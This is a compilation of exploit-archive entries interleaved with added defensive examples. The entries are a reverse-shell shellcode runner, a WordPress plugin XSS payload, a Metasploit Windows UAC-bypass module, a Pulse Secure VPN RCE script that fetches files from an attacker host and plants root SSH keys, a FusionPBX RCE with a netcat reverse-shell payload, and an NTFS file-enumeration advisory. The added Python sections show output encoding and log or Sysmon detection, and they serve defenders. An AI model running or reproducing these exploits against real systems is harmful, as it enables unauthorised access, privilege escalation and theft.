; and place pointer to ebx
mov ebx,esp

; envp to edx and ecx
push ecx
mov edx,esp
push ecx
mov ecx,esp

; execve syscall here
mov al,0xB

; and pop shell
int 0x80

; neat exit
xor eax,eax
mov al,0x1
int 0x80

*/

#include <stdio.h>
#include <string.h>

unsigned char buf[] = "\x31\xc0\x31\xdb\x50\x40\x50\x40\x50\x89\xe1\xb0\x33\x04\x33\x43\xcd\x80\x89\xc6\x31\xc0\x50\xc6\x04\x24\x7f\xc6\x44\x24\x03\x01\x66\x68\x11\x5c\x43\x66\x53\x89\xe1\xb0\x33\x04\x33\x50\x51\x56\x89\xe1\x43\xcd\x80\x31\xd2\x87\xca\xb1\x03\x89\xf3\x31\xc0\xb0\x3f\x49\xcd\x80\xb0\x3f\x49\xcd\x80\xb0\x3f\x49\xcd\x80\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x51\x89\xe1\xb0\x0b\xcd\x80\x31\xc0\xb0\x01\xcd\x80";


int main(void) {
    /* strlen() returns size_t, so print it with %zu; a length that stops short of
       sizeof(buf) - 1 would mean a stray null byte inside the shellcode */
    printf("Shellcode Length: %zu\n", strlen(buf));
    /* cast the byte array to a function pointer and call it; the array must be
       in executable memory for the call to work */
    int (*ret)() = (int(*)())buf;
    ret();
    return 0;
}

WordPress Ecpay Logistics For WooCommerce 1.2.181030 Cross Site Scripting


WordPress Ecpay Logistics For WooCommerce plugin version 1.2.181030 suffers from a cross site scripting vulnerability.


MD5 | 5c3efc63df06686f33963f7fe86fa773

Class: Input Validation Error
Remote: Yes

Credit: Ricardo Sanchez
Vulnerable: Ecpay logistics for woocommerce 1.2.181030

Ecpay logistics for woocommerce is prone to a reflected cross-site
scripting vulnerability because it fails to sufficiently sanitize
user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the
browser of an unsuspecting user in the context of the affected site. This
may allow the attacker to steal cookie-based authentication credentials and
to launch other attacks.
To exploit this issue, follow these steps.
The XSS is reflected because the value of the URL parameter is not filtered correctly:

Demo Request GET:
http://localhost/wordpress/wp-content/plugins/ecpay-logistics-for-woocommerce/getChangeResponse.php?&CVSStoreName=hola2%22;%20%3C/script%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E
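The demo request's payload closes a JavaScript string and a script block, which tells a reviewer where the reflection sits and therefore which encoder fixes it. The following added example (written for this page, not code from the plugin or from the advisory author) models that pattern in Python: `render_unsafe` is a hypothetical reconstruction of the vulnerable reflection, `render_html_escaped` shows why plain HTML escaping is the wrong tool inside `<script>`, and `render_js_safe` shows the encoder a JavaScript string context actually needs. The sample value is the advisory's parameter after URL decoding; the variable name `storeName` and the surrounding markup are assumptions.

```python
import html
import json
import re

# Constructed sample: the demo request's CVSStoreName value from the advisory, URL-decoded.
SAMPLE_PAYLOAD = 'hola2"; </script><script>alert("XSS")</script>'
SAMPLE_BENIGN = "O'Brien Store"


def render_unsafe(store_name):
    # Hypothetical model of the vulnerable pattern: the parameter is inserted
    # verbatim into a JavaScript string literal inside an inline <script> block.
    return '<script>var storeName = "%s";</script>' % store_name


def render_html_escaped(store_name):
    # HTML-escaping only. This does stop the </script> breakout, but it is the
    # wrong encoder for a JavaScript context: the browser does not decode entities
    # inside <script>, so the script receives O&#x27;Brien instead of O'Brien.
    return '<script>var storeName = "%s";</script>' % html.escape(store_name, quote=True)


def render_js_safe(store_name):
    # Fix for a JavaScript string context: JSON-encode the value (quotes, backslashes
    # and control characters are escaped), then escape "</" so the HTML parser can
    # never see a closing </script> tag inside the literal. "\/" is valid JSON.
    encoded = json.dumps(store_name).replace("</", "<\\/")
    return "<script>var storeName = %s;</script>" % encoded


def count_script_closers(markup):
    # A correctly rendered page has exactly one </script> for this block.
    return len(re.findall(r"</script", markup, re.IGNORECASE))


def breaks_out(render, value):
    # True when the rendered markup lets the value terminate the script block early.
    return count_script_closers(render(value)) != 1


def recover_js_value(markup):
    # Read the literal back the way a JavaScript engine would (JSON string syntax is
    # valid JS string syntax here) to show the safe encoder preserves the value.
    m = re.search(r"var storeName = (.*);</script>$", markup)
    return json.loads(m.group(1))


if __name__ == "__main__":
    renderers = [("unsafe", render_unsafe), ("html-escaped", render_html_escaped), ("js-safe", render_js_safe)]
    for name, render in renderers:
        print("%-13s breaks out of <script>: %s" % (name, breaks_out(render, SAMPLE_PAYLOAD)))
    print("js-safe round-trips the value:", recover_js_value(render_js_safe(SAMPLE_PAYLOAD)) == SAMPLE_PAYLOAD)
```

The point a practitioner should take away: the fix is context-specific. HTML escaping happens to block this particular breakout, but it corrupts legitimate values in a script context; JSON encoding plus `</` escaping is the encoder that matches where the value lands.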

Windows 10 UAC Protection Bypass Via Windows Store (WSReset.exe) And Registry


This Metasploit module exploits a flaw in the WSReset.exe file associated with the Windows Store. This binary has autoelevate privs, and it will run a binary file contained in a low-privilege registry location. By placing a link to the binary in the registry location, WSReset.exe will launch the binary as a privileged user.


MD5 | d470c356d7562ece1d5652e2d264a075

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
  Rank = ManualRanking

  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper
  include Post::Windows::Priv
  include Post::Windows::Runas

  def initialize(info = {})
    super(
      update_info(info,
        'Name' => 'Windows 10 UAC Protection Bypass Via Windows Store (WSReset.exe) and Registry',
        'Description' => %q(
          This module exploits a flaw in the WSReset.exe file associated with the Windows
          Store. This binary has autoelevate privs, and it will run a binary file
          contained in a low-privilege registry location. By placing a link to
          the binary in the registry location, WSReset.exe will launch the binary as
          a privileged user.
        ),
        'License' => MSF_LICENSE,
        'Author' => [
          'ACTIVELabs', # discovery
          'sailay1996', # poc
          'bwatters-r7', # metasploit module
        ],
        'Platform' => ['win'],
        'SessionTypes' => ['meterpreter'],
        'Targets' => [[ 'Automatic', {} ]],
        'DefaultTarget' => 0,
        'DefaultOptions' => {
          'WfsDelay' => 15
        },
        'DisclosureDate' => 'Feb 19 2019',
        'Notes' =>
          {
            'SideEffects' => [ ARTIFACTS_ON_DISK, SCREEN_EFFECTS ]
          },
        'References' => [
          ['URL', 'https://www.activecyber.us/activelabs/windows-uac-bypass'],
          ['URL', 'https://heynowyouseeme.blogspot.com/2019/08/windows-10-lpe-uac-bypass-in-windows.html'],
          ['URL', 'https://github.com/sailay1996/UAC_bypass_windows_store'],
        ]
      )
    )
    register_options(
      [OptString.new('PAYLOAD_NAME', [false, 'The filename to use for the payload binary (%RAND% by default).', nil])]
    )
  end

  def check
    if sysinfo['OS'] =~ /Windows 10/ && is_uac_enabled? && exists?("C:\\Windows\\System32\\WSReset.exe")
      return CheckCode::Appears
    end

    CheckCode::Safe
  end

  def exploit
    check_permissions!
    case get_uac_level
    when UAC_PROMPT_CREDS_IF_SECURE_DESKTOP,
         UAC_PROMPT_CONSENT_IF_SECURE_DESKTOP,
         UAC_PROMPT_CREDS, UAC_PROMPT_CONSENT
      fail_with(Failure::NotVulnerable,
                "UAC is set to 'Always Notify'. This module does not bypass this setting, exiting...")
    when UAC_DEFAULT
      print_good('UAC is set to Default')
      print_good('BypassUAC can bypass this setting, continuing...')
    when UAC_NO_PROMPT
      print_warning('UAC set to DoNotPrompt - using ShellExecute "runas" method instead')
      shell_execute_exe
      return
    end

    # get directory locations straight
    win_dir = session.sys.config.getenv('windir')
    vprint_status("win_dir = " + win_dir)
    tmp_dir = session.sys.config.getenv('tmp')
    vprint_status("tmp_dir = " + tmp_dir)
    exploit_dir = win_dir + "\\System32\\"
    vprint_status("exploit_dir = " + exploit_dir)
    reset_filepath = exploit_dir + "WSReset.exe"
    vprint_status("exploit_file = " + reset_filepath)

    # make payload
    payload_name = datastore['PAYLOAD_NAME'] || Rex::Text.rand_text_alpha((rand(8) + 6)) + '.exe'
    payload_pathname = tmp_dir + '\\' + payload_name
    vprint_status("payload_pathname = " + payload_pathname)
    vprint_status("Making Payload")
    payload = generate_payload_exe
    reg_command = exploit_dir + "cmd.exe /c start #{payload_pathname}"
    vprint_status("reg_command = " + reg_command)
    registry_key = "HKCU\\Software\\Classes\\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\\Shell\\open\\command"

    # make registry changes
    vprint_status("Making Registry Changes")
    begin
      registry_createkey(registry_key)
      registry_setvaldata(registry_key, "DelegateExecute", '', "REG_SZ")
      registry_setvaldata(registry_key, '', reg_command, "REG_SZ")
    rescue ::Exception => e
      print_error(e.to_s)
    end
    vprint_status("Registry Changes Complete")
    # Upload payload
    vprint_status("Uploading Payload to #{payload_pathname}")
    write_file(payload_pathname, payload)
    vprint_status("Payload Upload Complete")

    vprint_status("Launching " + reset_filepath)
    begin
      session.sys.process.execute("cmd.exe /c \"#{reset_filepath}\"", nil, 'Hidden' => true)
    rescue ::Exception => e
      print_error(e.to_s)
    end
    print_warning("This exploit requires manual cleanup of '#{payload_pathname}'!")
    # wait for a few seconds before cleaning up
    sleep(20)
    vprint_status("Removing Registry Changes")
    registry_deletekey(registry_key)
    vprint_status("Registry Changes Removed")
  end

  def check_permissions!
    unless check == Exploit::CheckCode::Appears
      fail_with(Failure::NotVulnerable, "Target is not vulnerable.")
    end
    fail_with(Failure::None, 'Already in elevated state') if is_admin? || is_system?
    # Check if you are an admin
    # is_in_admin_group can be nil, true, or false
    print_status('UAC is Enabled, checking level...')
    vprint_status('Checking admin status...')
    admin_group = is_in_admin_group?
    if admin_group.nil?
      print_error('Either whoami is not there or failed to execute')
      print_error('Continuing under assumption you already checked...')
    else
      if admin_group
        print_good('Part of Administrators group! Continuing...')
      else
        fail_with(Failure::NoAccess, 'Not in admins group, cannot escalate with this module')
      end
    end

    if get_integrity_level == INTEGRITY_LEVEL_SID[:low]
      fail_with(Failure::NoAccess, 'Cannot BypassUAC from Low Integrity Level')
    end
  end
end
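The module leaves a very specific trail: a `DelegateExecute` value and a command string written under a per-user `HKCU\Software\Classes\AppX...\Shell\open\command` key, followed within seconds by a launch of `WSReset.exe`. The following added detection example (written for this page, not part of the Metasploit module or of any vendor product) walks constructed Sysmon-style events (Event ID 13 registry value set, Event ID 1 process create) and raises a medium alert for the registry write alone and a high alert when the same user launches WSReset.exe inside a short window. It generalises the module's single AppX key to any AppX handler key, since the technique does not depend on that one identifier; the event field names, the `HKU\<SID>` rendering of HKCU paths and the 120-second window are assumptions about the log source.

```python
import re
from datetime import datetime, timedelta

# Matches any value under a per-user AppX Shell\open\command key. The module's own key
# (AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2) is one instance; the pattern is generalised to
# every AppX handler because the technique is the same for any auto-elevating caller.
APPX_COMMAND_RE = re.compile(
    r"\\Software\\Classes\\AppX[0-9a-z]+\\Shell\\open\\command\\(?P<value>[^\\]+)$",
    re.IGNORECASE,
)
# How long after the registry write a WSReset.exe launch still counts as correlated (assumption).
CORRELATION_WINDOW = timedelta(seconds=120)

# Constructed sample of Sysmon events (ID 13 = registry value set, ID 1 = process create),
# reduced to the fields the analysis needs. HKCU paths are shown as HKU\<SID>, which is
# an assumption about how the log source renders per-user keys.
SAMPLE_EVENTS = [
    {"time": "2019-09-05T10:00:00", "EventID": 13, "User": "LAB\\alice",
     "Image": "C:\\Windows\\System32\\reg.exe",
     "TargetObject": "HKU\\S-1-5-21-1111\\Software\\Classes\\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\\Shell\\open\\command\\DelegateExecute",
     "Details": ""},
    {"time": "2019-09-05T10:00:01", "EventID": 13, "User": "LAB\\alice",
     "Image": "C:\\Windows\\System32\\reg.exe",
     "TargetObject": "HKU\\S-1-5-21-1111\\Software\\Classes\\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\\Shell\\open\\command\\(Default)",
     "Details": "C:\\Windows\\System32\\cmd.exe /c start C:\\Users\\alice\\AppData\\Local\\Temp\\payload.exe"},
    {"time": "2019-09-05T10:00:03", "EventID": 1, "User": "LAB\\alice",
     "Image": "C:\\Windows\\System32\\WSReset.exe", "TargetObject": "", "Details": ""},
    # A user resetting the Store cache by hand: WSReset.exe with no preceding key write.
    {"time": "2019-09-05T11:30:00", "EventID": 1, "User": "LAB\\bob",
     "Image": "C:\\Windows\\System32\\WSReset.exe", "TargetObject": "", "Details": ""},
    # An unrelated per-user file association change under HKCU\Software\Classes.
    {"time": "2019-09-05T12:00:00", "EventID": 13, "User": "LAB\\carol",
     "Image": "C:\\Windows\\explorer.exe",
     "TargetObject": "HKU\\S-1-5-21-3333\\Software\\Classes\\.txt\\(Default)", "Details": "txtfile"},
]


def registry_hit(event):
    """Return a reason string if an Event ID 13 write matches the bypass pattern, else None."""
    if event["EventID"] != 13:
        return None
    m = APPX_COMMAND_RE.search(event["TargetObject"])
    if not m:
        return None
    value = m.group("value")
    if value.lower() == "delegateexecute":
        return "DelegateExecute set on per-user AppX Shell\\open\\command key"
    if value == "(Default)":
        return "per-user AppX Shell\\open\\command default value set to: " + event["Details"]
    return "write to per-user AppX Shell\\open\\command key (value %s)" % value


def analyze(events):
    """Walk events in time order; a registry hit alerts on its own (medium) and a WSReset.exe
    launch by the same user inside CORRELATION_WINDOW escalates to high."""
    alerts = []
    last_hit = {}  # user -> time of the most recent matching registry write
    for event in sorted(events, key=lambda e: e["time"]):
        t = datetime.fromisoformat(event["time"])
        reason = registry_hit(event)
        if reason:
            last_hit[event["User"]] = t
            alerts.append({"severity": "medium", "user": event["User"], "time": event["time"], "detail": reason})
            continue
        if event["EventID"] == 1 and event["Image"].lower().endswith("\\wsreset.exe"):
            seen = last_hit.get(event["User"])
            if seen is not None and t - seen <= CORRELATION_WINDOW:
                delay = int((t - seen).total_seconds())
                alerts.append({"severity": "high", "user": event["User"], "time": event["time"],
                               "detail": "WSReset.exe launched %ds after AppX handler key was modified" % delay})
    return alerts


if __name__ == "__main__":
    for alert in analyze(SAMPLE_EVENTS):
        print("[%s] %s %s: %s" % (alert["severity"].upper(), alert["time"], alert["user"], alert["detail"]))
```

Bob's stand-alone WSReset.exe launch produces no alert, which is the behaviour a detection needs in an environment where users legitimately reset the Store cache; the registry write is the distinguishing signal, and the module's `sleep(20)` before deleting the key is why a short correlation window is enough.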


Pulse Secure 8.1R15.1 / 8.2 / 8.3 / 9.0 SSL VPN Remote Code Execution


Pulse Secure versions 8.1R15.1, 8.2, 8.3, and 9.0 SSL VPN remote code execution exploit.


MD5 | 86d78b8af9738ec8a8ba5b6eb9822ba1

#!/usr/bin/python
#
# Exploit Title: Pulse Secure Post-Auth Remote Code Execution
# Google Dork: inurl:/dana-na/ filetype:cgi
# Date: 09/05/2019
# Exploit Author: Justin Wagner (0xDezzy), Alyssa Herrera (@Alyssa_Herrera_)
# Vendor Homepage: https://pulsesecure.net
# Version: 8.1R15.1, 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4
# Tested on: linux
# CVE : CVE-2019-11539
#
# Initial Discovery: Orange Tsai (@orange_8361), Meh Chang (@mehqq_)
#
# Exploits CVE-2019-11539 to run commands on the Pulse Secure Connect VPN
# Downloads Modified SSH configuration and authorized_keys file to allow SSH as root.
# You will need your own configuration and authorized_keys files.
#
# Reference: https://nvd.nist.gov/vuln/detail/CVE-2019-11539
# Reference: https://blog.orange.tw/2019/09/attacking-ssl-vpn-part-3-golden-pulse-secure-rce-chain.html
#
# Please Note, Alyssa or myself are not responsible with what is done with this code. Please use this at your own discretion and with proper authorization.
# We will not bail you out of jail, go to court, etc if you get caught using this maliciously. Be smart and remember, hugs are free.
#
# Imports
import requests
import urllib
from bs4 import BeautifulSoup

# Host information
host = '' # Host to exploit
login_url = '/dana-na/auth/url_admin/login.cgi' # Login page
CMDInjectURL = '/dana-admin/diag/diag.cgi' # Overwrites the Template when using tcpdump
CommandExecURL = '/dana-na/auth/setcookie.cgi' # Executes the code

# Login Credentials
user = 'admin' # Default Username
password = 'password' # Default Password

# Necessary for Curl
downloadHost = '' # IP or FQDN for host running webserver
port = '' # Port where web service is running. Needs to be a string, hence the quotes.

# Proxy Configuration
# Uncomment if you need to use a proxy or for debugging requests
proxies = {
    # 'http': 'http://127.0.0.1:8080',
    # 'https': 'http://127.0.0.1:8080',
}

# Headers for requests
headers = {
    'User-Agent':'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36',
    'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
    'Accept-Language':'en-US,en;q=0.5',
    'Accept-Encoding':'gzip, deflate',
    'Content-Type':'application/x-www-form-urlencoded',
}

# Cookies to send with request
cookies = {
    'lastRealm':'Admin%20Users',
    'DSSIGNIN':'url_admin',
    'DSSignInURL':'/admin/',
    'DSPERSISTMSG':'',
}

# Data for post request
loginData = {
    'tz_offset': 0,
    'username': user,
    'password': password,
    'realm': 'Admin Users',
    'btnSubmit': 'Sign In',
}

s = requests.Session() # Sets up the session
s.proxies = proxies # Sets up the proxies

# Disable Warnings from requests library
requests.packages.urllib3.disable_warnings()

# Administrator Login logic
# Probably wouldn't have figured this out without help from @buffaloverflow
def adminLogin():
    global xsAuth
    global _headers

    # Send the initial request
    r = requests.get('https://%s/dana-na/auth/url_admin/welcome.cgi' % host, cookies=cookies, headers=headers, verify=False, proxies=proxies)

    print('[#] Logging in...') # Self Explanatory
    r = s.post('https://' + host + login_url, data=loginData,verify=False, proxies=proxies, allow_redirects=False) # sends login post request
    print('[#] Sent Login Request...')

    # Login Logic
    if r.status_code == 302 and 'welcome.cgi' in r.headers.get("location",""):
        referer = 'https://%s%s' %(host, r.headers["location"]) # Gets the referer
        r = s.get(referer, verify=False) # Sends a get request
        soup = BeautifulSoup(r.text, 'html.parser') # Sets up HTML Parser
        FormDataStr = soup.find('input', {'id':'DSIDFormDataStr'})["value"] # Gets DSIDFormDataStr
        print('[#] Grabbing xsauth...')
        xsAuth = soup.find('input', {'name':'xsauth'})["value"] # Gets the cross site auth token
        print('[!] Got xsauth: ' + xsAuth) # Self Explanatory
        data = {'btnContinue':'Continue the session', 'FormDataStr':FormDataStr, 'xsauth':xsAuth} # Submits the continue session page
        _headers = headers # Sets the headers
        _headers.update({'referer':referer}) # Updates the headers
        r = s.post('https://%s' %(host + login_url), data=data, headers=_headers, verify=False, proxies=proxies) #Sends a new post request

    print('[+] Logged in!') # Self Explanatory

# Command injection logic
def cmdInject(command):
    r = s.get('https://' + host + CMDInjectURL, verify=False, proxies=proxies)
    if r.status_code == 200:
        soup = BeautifulSoup(r.text, 'html.parser') # Sets up HTML Parser
        xsAuth = soup.find('input', {'name':'xsauth'})["value"] # Gets the cross site auth token
        payload = {
            'a':'td',
            'chkInternal':'On',
            'optIFInternal':'int0',
            'pmisc':'on',
            'filter':'',
            'options':'-r$x="%s",system$x# 2>/data/runtime/tmp/tt/setcookie.thtml.ttc <' %command,
            'toggle':'Start+Sniffing',
            'xsauth':xsAuth
        }
        # Takes the generated URL specific to the command then encodes it in hex for the DSLaunchURL cookie
        DSLaunchURL_cookie = {'DSLaunchURL':(CMDInjectURL+'?a=td&chkInternal=on&optIFInternal=int0&pmisc=on&filter=&options=-r%24x%3D%22'+urllib.quote_plus(command)+'%22%2Csystem%24x%23+2%3E%2Fdata%2Fruntime%2Ftmp%2Ftt%2Fsetcookie.thtml.ttc+%3C&toggle=Start+Sniffing&xsauth='+xsAuth).encode("hex")}
        # print('[+] Sending Command injection: %s' %command) # Self Explanatory. Useful for seeing what commands are run
        # Sends the get request to overwrite the template
        r = s.get('https://' + host + CMDInjectURL+'?a=td&chkInternal=on&optIFInternal=int0&pmisc=on&filter=&options=-r%24x%3D%22'+command+'%22%2Csystem%24x%23+2%3E%2Fdata%2Fruntime%2Ftmp%2Ftt%2Fsetcookie.thtml.ttc+%3C&toggle=Start+Sniffing&xsauth='+xsAuth, cookies=DSLaunchURL_cookie, verify=False, proxies=proxies)
        # Sends the get request to execute the code
        r = s.get('https://' + host + CommandExecURL, verify=False)

# Main logic
if __name__ == '__main__':
    adminLogin()
    try:
        print('[!] Starting Exploit')
        print('[*] Opening Firewall port...')
        cmdInject('iptables -A INPUT -p tcp --dport 6667 -j ACCEPT') # Opens SSH port
        print('[*] Downloading Necessary Files....')
        cmdInject('/home/bin/curl '+downloadHost+':'+port+'/cloud_sshd_config -o /tmp/cloud_sshd_config') # download cloud_sshd_config
        cmdInject('/home/bin/curl '+downloadHost+':'+port+'/authorized_keys -o /tmp/authorized_keys') # download authorized_keys
        print('[*] Backing up Files...')
        cmdInject('cp /etc/cloud_sshd_config /etc/cloud_sshd_config.bak') # backup cloud_sshd_config
        cmdInject('cp /.ssh/authorized_keys /.ssh/authorized_keys.bak') # backup authorized_keys
        print('[*] Overwriting Old Files...')
        cmdInject('cp /tmp/cloud_sshd_config /etc/cloud_sshd_config') # overwrite cloud_sshd_config
        cmdInject('cp /tmp/authorized_keys /.ssh/authorized_keys') # overwrite authorized_keys
        print('[*] Restarting SSHD...')
        cmdInject('kill -SIGHUP $(pgrep -f "sshd-ive")') # Restart sshd via a SIGHUP
        print('[!] Done Exploiting the system.')
        print('[!] Please use the following command:')
        print('[!] ssh -p6667 root@%s' % host)
    except Exception as e:
        raise
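The injection in this exploit is visible in the request itself: the `options` parameter of `/dana-admin/diag/diag.cgi` carries Perl and shell metacharacters, a `system` call and a path into the template cache that no real packet-capture option string would contain. The following added example (written for this page; not part of the exploit above or of any Pulse Secure software) parses combined-format access log lines and flags diag.cgi requests whose decoded `options` value shows those traits. The log format, the sample lines and the field names are constructed assumptions; the signature strings come from the request the exploit sends.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Combined-log-format request line parser (assumption: the appliance, or a proxy in front
# of it, records requests in this format).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
DIAG_PATH = "/dana-admin/diag/diag.cgi"
# Characters that have no place in a tcpdump option string but drive the Perl/shell injection.
METACHARS = "$;|<>`#"

# Constructed sample log lines: line 1 mirrors the exploit's request (command "id"), line 2 is
# an ordinary capture with plain tcpdump options, line 3 is an unrelated login page hit.
SAMPLE_LOG = """\
10.0.0.5 - - [05/Sep/2019:10:00:01 +0000] "GET /dana-admin/diag/diag.cgi?a=td&chkInternal=on&optIFInternal=int0&pmisc=on&filter=&options=-r%24x%3D%22id%22%2Csystem%24x%23+2%3E%2Fdata%2Fruntime%2Ftmp%2Ftt%2Fsetcookie.thtml.ttc+%3C&toggle=Start+Sniffing&xsauth=0123abcd HTTP/1.1" 200 512
10.0.0.6 - - [05/Sep/2019:10:05:42 +0000] "GET /dana-admin/diag/diag.cgi?a=td&chkInternal=on&optIFInternal=int0&pmisc=on&filter=port+443&options=-nn+-s0&toggle=Start+Sniffing&xsauth=0123abcd HTTP/1.1" 200 512
10.0.0.7 - - [05/Sep/2019:10:06:00 +0000] "GET /dana-na/auth/url_default/welcome.cgi HTTP/1.1" 200 1024
"""


def inspect_request(line):
    """Return a finding dict for a suspicious diag.cgi request, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    if parts.path != DIAG_PATH:
        return None
    query = parse_qs(parts.query, keep_blank_values=True)
    options = query.get("options", [""])[0]  # percent-decoded, '+' turned into spaces
    reasons = []
    found = [c for c in METACHARS if c in options]
    if found:
        reasons.append("metacharacters %s in tcpdump options" % "".join(found))
    if "system" in options:
        reasons.append("'system' call in tcpdump options")
    if "/data/runtime/tmp/" in options or ".thtml" in options:
        reasons.append("template cache path referenced in tcpdump options")
    if not reasons:
        return None
    return {"ip": m.group("ip"), "time": m.group("ts"), "options": options, "reasons": reasons}


def scan(lines):
    """Run inspect_request over an iterable of log lines and keep the findings."""
    return [hit for hit in (inspect_request(line) for line in lines) if hit]


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG.splitlines()):
        print("%s %s options=%r -> %s" % (hit["time"], hit["ip"], hit["options"], "; ".join(hit["reasons"])))
```

Decoding the query before matching matters: the exploit sends the injection percent-encoded, so a signature written against the raw request line would need every encoding variant, whereas matching the decoded `options` value catches them all. A legitimate capture request with `options=-nn -s0` passes through without a finding.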

FusionPBX 4.4.8 Remote Code Execution


FusionPBX version 4.4.8 remote code execution exploit.


MD5 | 0c516823852522b8ca82abb6defe813b

#!/usr/bin/python3

'''
# Exploit Title: FusionPBX v4.4.8 Remote Code Execution
# Date: 13/08/2019
# Exploit Author: Askar (@mohammadaskar2)
# CVE : 2019-15029
# Vendor Homepage: https://www.fusionpbx.com
# Software link: https://www.fusionpbx.com/download
# Version: v4.4.8
# Tested on: Ubuntu 18.04 / PHP 7.2
'''

import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning
import sys
import warnings
from bs4 import BeautifulSoup

# turn off BeautifulSoup and requests warnings
warnings.filterwarnings("ignore", category=UserWarning, module='bs4')
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

if len(sys.argv) != 6:
    print(len(sys.argv))
    print("[~] Usage : ./FusionPBX-exploit.py url username password ip port")
    print("[~] ./exploit.py http://example.com admin p@$$word 172.0.1.3 1337")
    exit()

url = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]
ip = sys.argv[4]
port = sys.argv[5]


request = requests.session()

login_info = {
    "username": username,
    "password": password
}

login_request = request.post(
    url+"/core/user_settings/user_dashboard.php",
    login_info, verify=False
)


if "Invalid Username and/or Password" not in login_request.text:
    print("[+] Logged in successfully")
else:
    print("[+] Error with creds")

service_edit_page = url + "/app/services/service_edit.php"
services_page = url + "/app/services/services.php"
payload_info = {
    # the service name you want to create
    "service_name":"PwnedService3",
    "service_type":"pid",
    "service_data":"1",

    # this value contains the payload , you can change it as you want
    "service_cmd_start":"rm /tmp/z;mkfifo /tmp/z;cat /tmp/z|/bin/sh -i 2>&1|nc 172.0.1.3 1337 >/tmp/z",
    "service_cmd_stop":"stop",
    "service_description":"desc",
    "submit":"Save"
}

request.post(service_edit_page, payload_info, verify=False)
html_page = request.get(services_page, verify=False)

soup = BeautifulSoup(html_page.text, "lxml")

for a in soup.find_all(href=True):
    if "PwnedService3" in a:
        sid = a["href"].split("=")[1]
        break

service_page = url + "/app/services/services.php?id=" + sid + "&a=start"
print("[+] Triggering the exploit , check your netcat !")
request.get(service_page, verify=False)

Microsoft Windows NTFS Privileged File Access Enumeration


Microsoft Windows suffers from an NTFS privileged file access enumeration vulnerability. Attackers possessing user-only rights can gather intelligence or profile other user account activities by brute forcing a correct file name due to inconsistent error messaging.


MD5 | 8f8a5a6cf1cf40cfec6b841ca09e2618

[+] Credits: John Page (aka hyp3rlinx)    
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-NTFS-PRIVILEGED-FILE-ACCESS-ENUMERATION.txt
[+] ISR: ApparitionSec


[Vendor]
www.microsoft.com


[Product]
Windows NTFS

NTFS is a proprietary journaling file system developed by Microsoft. Starting with Windows NT 3.1, it is the default file system of the Windows NT family.


[Vulnerability Type]
Privileged File Access Enumeration


[CVE Reference]
N/A


[Security Issue]
Attackers possessing user-only rights can gather intelligence or profile other user account activities by brute forcing a correct file name.
This is possible because Windows returns inconsistent error messages when accessing unauthorized files that contain a valid extension
or have a "." (dot) as part of the file or folder name.

Typically, enumeration is seen in web-application attacks that target account usernames. In this case the target is the filenames
of other users: an attacker may need to locate files up front that they wish to steal, possibly prior to launching say an XXE exploit
to steal those files, or may simply sniff the account's directories passively to profile the mark and learn their daily activities.

Standard account users attempting to open another user's files or folders that do not contain a valid extension or a dot "." in the
filename are always issued the expected "Access is denied" system error message.

However, for files that contain a dot in the filename and that also do not exist, the system echoes the following attacker-friendly
warning: "The system cannot find the file".

This error message inconsistency allows attackers to infer that files EXIST, because any other time the response is "The system cannot find the file".

For example, the Windows commands DIR and TYPE always greet attackers with the expected "Access is denied" message, whether the file exists or not.
This helps protect users from having their local files known to attackers, since the system returns the same message regardless of whether the
file exists when using those commands. Their output is not affected by whether the file has a valid extension.

However, that protection can be bypassed by avoiding the Windows DIR and TYPE commands and instead attempting to open the inaccessible
user's file directly on the command line, much like calling a program and pressing the Enter key.

After the Win32 API function CreateFile is called, it returns one of the following:

1) "The system cannot find the file"
2) "Access is denied"

c:\>c:\Users\privileged-victim\Contacts\Hubert Dingleberry.contact
The system cannot find the file <==== DOES NOT EXIST

c:\>C:\Users\noprivs>c:\Users\privileged-victim\Contacts\Toolio McDoucheLeroy.contact
Access is denied. <===== EXISTS

c:\>C:\Users\noprivs>c:\Users\privileged-victim\Contacts\Toolio McDoucheLeroy.con
The system cannot find the file <==== DOES NOT EXIST

c:\>C:\Users\noprivs>c:\Users\privileged-victim\Contacts\whatever
Access is denied. <===== FALSE POSITIVE NO EXTENSION PRESENT IN THE FILENAME

From a defensive perspective this can be leveraged to detect basic IOC and malware artifacts such as .tmp, .ini, .dll, .exe
or related config files on disk with user-only rights, instead of authenticating with admin rights, as a quick paranoid first pass.

For example, if malware hides itself by unlinking from the EPROCESS list in memory, or by using programs such as WinRAP to hide
processes from Windows TaskMgr, it may not be discovered even with the tasklist command (the EPROCESS structure and its flink/blink
pointers are how Windows TaskMgr shows all running processes). However, it may still be detected by testing for the correct IOC name
if the malicious code happens to reside on disk and not only in memory. What's cool is that this can be done without admin rights.

Other Windows commands that also confirm file existence by comparing error messages are start, call, copy, icacls, and cd.
However, the Windows commands rename, ren, cacls, type, dir, erase, move and del issue a flat "Access is denied" message.

Previously, MSRC recommended using ABE (Access-Based Enumeration). However, that feature only applies to viewing files and folders in a
shared folder, not to files or folders in the local file system.


Tested successfully on Win7/10


[Exploit/POC]
"NtFileSins.py"

from subprocess import Popen, PIPE
